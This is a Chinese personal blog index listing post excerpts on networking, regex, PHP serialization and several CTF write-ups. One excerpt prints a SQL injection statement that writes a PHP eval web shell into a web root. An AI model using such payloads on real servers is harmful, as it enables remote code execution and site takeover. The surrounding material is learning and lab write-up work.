2021年2月21日
IP认知
摘要: IP认知 序言 曾经,经常会听到IP什么的,听得只言片语,于是对IP有了印象,不过是片面的,认为IP是独一无二的,后来,觉得ifconfig中得到的IP地址,怎么和别人的有时候会一样,所以,就去深入了解一下IP,就有了这篇文章 IP分类 ip大家肯定知道由4段构成,但IP是由网段范围分类的 A、B、 阅读全文
posted @ 2021-02-21 15:42 猪猪侠的哥哥 阅读(73) 评论(0) 推荐(0) 编辑
SQL注入getshell-load_file读写文件
摘要: 当想要注入一个shell的时候,用了这么个语句 select '<?php eval($_POST[123]) ?>' into outfile 'D:/phpstudy_pro/WWW/123.php'; 意思为,将马写入目标文件 但是,我遇到了一个问题 ERROR 1290 (HY000): T 阅读全文
posted @ 2021-02-21 15:40 猪猪侠的哥哥 阅读(491) 评论(0) 推荐(0) 编辑
  2021年2月6日
计算机网络学习笔记
摘要: 计算机网络笔记 一.什么是INTERNET 互联网(internet)是一个巨型的连接小网络的大网络 网络包含互联网,网络是宏观的物与物之间的联系,而互联网则具体到是端到端,主机设备之间的联系 互联网从不同的角度可以有不同的解释 从网络本身角度 是由边和节点组成,由数据交换设备、协议等组成的通信网络 阅读全文
posted @ 2021-02-06 19:31 猪猪侠的哥哥 阅读(188) 评论(0) 推荐(0) 编辑
正则表达式学习
摘要: 正则表达式学习 推荐两个学习正则表达式的网站 https://codejiaonang.com/ https://regexr-cn.com/ []中括号中表示字符 如果只有一个[],后面没有其他字符了,那么就把[]中的字符全部匹配,每一个字符都会匹配需要的字符, 如果[]后面又其他字符,那么就把[ 阅读全文
posted @ 2021-02-06 19:30 猪猪侠的哥哥 阅读(126) 评论(0) 推荐(0) 编辑
  2021年2月2日
序列化小结
摘要: 序列化小结 记一些CTF出现的序列化与反序列化的知识点和题目。 序列化初始 序列化和反序列化的概念 序列化就是将对象转换成字符串。字符串包括 属性名 属性值 属性类型和该对象对应的类名。 反序列化则相反将字符串重新恢复成对象。 对象的序列化利于对象的保存和传输,也可以让多个文件共享对象。 序列化中常 阅读全文
posted @ 2021-02-02 08:47 猪猪侠的哥哥 阅读(169) 评论(0) 推荐(0) 编辑
  2021年1月31日
[BJDCTF 2nd]elementmaster
摘要: 没有太多头绪,只能打开源码看看 看到源码中有奇怪的两端编码,506F2E和706870 把他们十六进制转化为字符是Po.php 进入该网页是个点,这时候联合图画中的话语 我想到了整个元素周期表 所以,用脚本 import requests import re elements = ['H', 'He 阅读全文
posted @ 2021-01-31 21:04 猪猪侠的哥哥 阅读(74) 评论(0) 推荐(0) 编辑
[GKCTF2020]cve版签到
摘要: [GKCTF2020]cve版签到 view hint 可以看到是cve-2020-7066漏洞 上网搜了搜,是get_headers()的截断漏洞 PHP(PHP:Hypertext Preprocessor,PHP:超文本预处理器)是PHPGroup和开放源代码社区的共同维护的一种开源的通用计算 阅读全文
posted @ 2021-01-31 20:40 猪猪侠的哥哥 阅读(84) 评论(0) 推荐(0) 编辑
[HCTF 2018]WarmUp wp
摘要: [HCTF 2018]WarmUp wp 从源码发现有个source.php的文件 进入发现是代码审计 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist 阅读全文
posted @ 2021-01-31 20:17 猪猪侠的哥哥 阅读(83) 评论(0) 推荐(0) 编辑
ssti-flask初学者的总结
摘要: ssti-flask初学者的总结 前言 自己前段时间,在做一道题的时候,wp说是ssti漏洞,从此开始了ssti漏洞的学习,但是一开始的路程很艰难,因为网上的很多(至少我没看见过)博客,说是入门教程,但其实我看的很懵,因为他们好像默认学习ssti漏洞,python中的魔法方法,flask模块都已经了 阅读全文
posted @ 2021-01-31 19:45 猪猪侠的哥哥 阅读(955) 评论(1) 推荐(2) 编辑
  2021年1月28日
[BJDCTF 2nd]简单注入
摘要: [BJDCTF 2nd]简单注入 因为是简单注入 我一开始就是 ‘ 加上去,被过滤了 所以我fuzz了一下,发现常用的基本都被过滤了,而且,最重要的是闭合的符号都被过滤了 百思不得其解 看了师傅的wp,才知道robots.txt里有提示有hint.txt 因为此题特点是闭合符号被过滤,所以只有一种方 阅读全文
posted @ 2021-01-28 19:50 猪猪侠的哥哥 阅读(130) 评论(0) 推荐(0) 编辑
下一页

Powered by: 博客园 Copyright © 2024 猪猪侠的哥哥
Powered by .NET 8.0 on Kubernetes